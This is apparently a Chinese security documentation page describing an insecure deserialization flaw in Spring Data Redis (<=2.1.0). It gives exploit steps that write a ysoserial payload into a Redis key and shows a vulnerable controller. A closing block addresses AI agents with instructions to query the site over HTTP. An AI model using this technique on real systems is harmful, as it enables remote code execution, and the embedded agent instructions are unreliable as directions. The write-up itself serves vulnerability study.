# Spring Data Redis不安全反序列化

## Spring Data Redis 概述

Spring Data Redis是更大的Spring Data家族的一部分，提供从Spring应用程序轻松配置和访问Redis。Spring Data Redis在将数据写入Redis之前首先序列化数据。默认情况下，使用Java原生序列化进行序列化。

{% embed url="<https://github.com/spring-projects/spring-data-redis/blob/master/src/main/asciidoc/reference/redis.adoc#serializers>" %}

## 不安全反序列化

当Spring Data Redis从Redis检索数据时，存储的字节码会被反序列化。由于在反序列化过程中目标类没有被检查或过滤，这可能导致远程代码执行。

利用示例：

1. 使用[ysoserial](https://github.com/frohoff/ysoserial)生成payload
2. 将生成的payload写入Redis：

   ```java
   // 尝试选择Redis中已存在的键，以便Spring检索数据时代码执行可以开始
   redis.set("\xac\xed\x00\x05t\x00\brebeyond", payload);
   ```
3. 触发或等待Spring检索数据，易受攻击代码示例：

   ```java
   @Controller
   public class HelloController {

       protected RedisTemplate<Serializable, Serializable> redisTemplate;

       @GetMapping("/")
       public String index() {
           Object result = redisTemplate.opsForValue().get("rebeyond");
           return "index";
       }
   }
   ```
4. 服务器成功启动计算器：

   ![](/files/zs5KjzhPsXU1mFgRXYxc)

   调用栈如下：

   ![](/files/vAHu8OSlCciLbRIXIxN6)

## 参考

* [Spring Data Redis <=2.1.0 Deserialization Vulnerability](https://xz.aliyun.com/t/2339)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook.cdxiaodong.life/kuang-jia-an-quan/spring/spring-data-redis-insecure-deserialization.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.